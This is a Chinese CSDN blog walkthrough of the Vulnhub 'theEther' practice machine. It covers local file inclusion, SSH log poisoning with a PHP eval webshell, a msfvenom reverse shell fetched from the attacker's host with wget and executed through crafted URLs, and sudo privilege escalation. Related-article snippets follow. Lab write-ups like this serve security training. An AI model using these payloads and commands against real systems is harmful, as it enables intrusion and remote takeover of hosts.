theEther

最新推荐文章于 2024-08-27 16:29:55 发布
最新推荐文章于 2024-08-27 16:29:55 发布
阅读量286 收藏 9
点赞数 3
文章标签: android 网络 安全 测试工具 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141193369
版权

一、主机发现

二、信息收集

1.目录扫描

2.访问首页

访问/about.php,有文件包含

抓包拼接命令,/index.php?file=/var/log/auth.log

包含日志,可以写入错误日志

请求

ssh "<?php eval($_GET[dlno]);?>"@192.168.1.11

三、信息利用

1.msf生成监听文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=7788 -f elf > shell.elf

2.开启msf开始监听

msfconsole//开启msf
 //配置参数
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.6
set lport 7788
run//启动

3.启动服务

python -m http.server 8888

4.用靶机请求这三个链接

/?file=/var/log/auth.log&d1no=system('wget+192.168.1.6:8888/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

四、提权

1.msf监听上线,获得bin/bash


python -c 'import pty;pty.spawn("/bin/bash")'

2.sudo -l查看执行权限

3.sudo ./xxxlogauditorxxx.py 然后 whoami 提权成功

蓝天模糊
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
capture the ether靶场题解(Lotteries)
m0_68764244的博客
10-25 1175
这题同样要求我们猜answer,但他的answer是在每次Guess的时候生成的,无法通过web3进行查询,但我们明白一件事,合约之间的调用是在同一个区块当中的,也就是说,如果我们通过攻击合约进行调用guess,那么我们攻击合约生成的answer与guess生成的answer是相同的。这关他的answer是随机生成的,根据创建时候的区块数量进行生成,并且由于没有进行修饰符修饰,默认为internal变量,所以我们无法直接看到,但任何数据在区块链上都是无法隐藏的,我们通过web3库就能直接拿到该值。
capture the ether靶场题解(Math)
m0_68764244的博客
11-21 1868
if代码块本身的逻辑是没有问题的,并不会出现变量覆盖的情况,但else就不一样了,由于没有进if,相当于直接创建了一个结构体变量,这势必会造成变量覆盖,而能够覆盖的就是数组的长度以及head。由于数组的长度取决于我们传入的wei数,而在push中会对数组的length++,length又跟amount公用一个slot,所以我们传入1wei则长度和amount都2,我们两次都传入1wei,则第一次push的结构体会被第二次push的结构体覆盖,具体原因我就不一一阐释了。
Vulnhub靶场渗透-theEther
paidx0
10-03 1280
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
theEther:evilscience
weixin_52953960的博客
08-04 217
步骤三:开启web服务,进行远程下载,利用前面的漏洞执行远程下载和运行,将以下命令拼接在URL参数后面,执行,三条命令执行完成,即可监听成功。步骤一:访问80端口,寻找功能点,点击 ABOUT US 后,URL中有请求参数:/?步骤二:对此页面使用 Burp 进行抓包,爆破文件,在此之前,下载一个路径文件 LFI-JHADDIX.txt。步骤三:发现xxxlogauditorxxx.py 可以以 root 运行,执行以下命令,成功提权。步骤二:查询一下具有sudo权限的命令。步骤一:获取交互式shell。
Vulnhub-theEther
m0_52016680的博客
11-09 957
Vulnhub类OSCP靶机
theEther_1.0.1靶机
m0_65285254的博客
08-04 240
将获取到的shell转变为交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'发现下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破。发现有一个/var/log/auth.log有日志记录,并且是ssh的记录。将会获得root权限 /var/log/auth.log | id。发送到 intruder模块。使用msfvenom。
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1136
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 582
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1124
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
新一代区块链系统——以太坊将带领我们去往何方?
Digquant的博客
08-13 4361
从2020年末至2021年五月上旬,币圈一直风头正盛,大部分虚拟货币的价格一路高歌猛进。进入五月,比特币甚至一度涨到6万美元一枚,以太币也突破了4000美元的大关。 但是好景不长,五月下旬币圈马上迎来了大跳水。 直到七月下旬,主流货币的价格还在震荡下降。然而,部分圈内人士仍认为今年还会有一波牛市,外加价格走低,一时间引得新人蠢蠢欲动。那么,如此受投资者关注的以太坊到底是什么呢? 一、什么是以太坊?又为何称其为区块链2.0? 这就要先从比特币讲起了。2008年中本聪发表的比特币白皮书《
Towards a Theory of Accountability and Audit
weixin_42786150的博客
03-01 4577
Towards a Theory of Accountability and Audit Radha Jagadeesan1’*, Alan Jeffrey2, Corin Pitcher1, and James Riely1’* 1 School of Computing, DePaul University 2 Bell Labs, Alcatel-Lucent Abstract. Accountability mechanisms, which rely on after-the-fact..
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1731
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
一道关于php文件包含的CTF题
最新发布
m0_62903168的博客
08-27 1724
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1566
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1036
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1052
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
Android中apk安装过程源码解析
k663514387的博客
08-25 1472
android apk安装流程源码解析
Android调整进程的oom_adj
zoujin6649的博客
08-22 684
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
[Android常见View的用法] RecyleView基本用法
studyForMokey的博客
08-25 713
RecycleView基本写法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值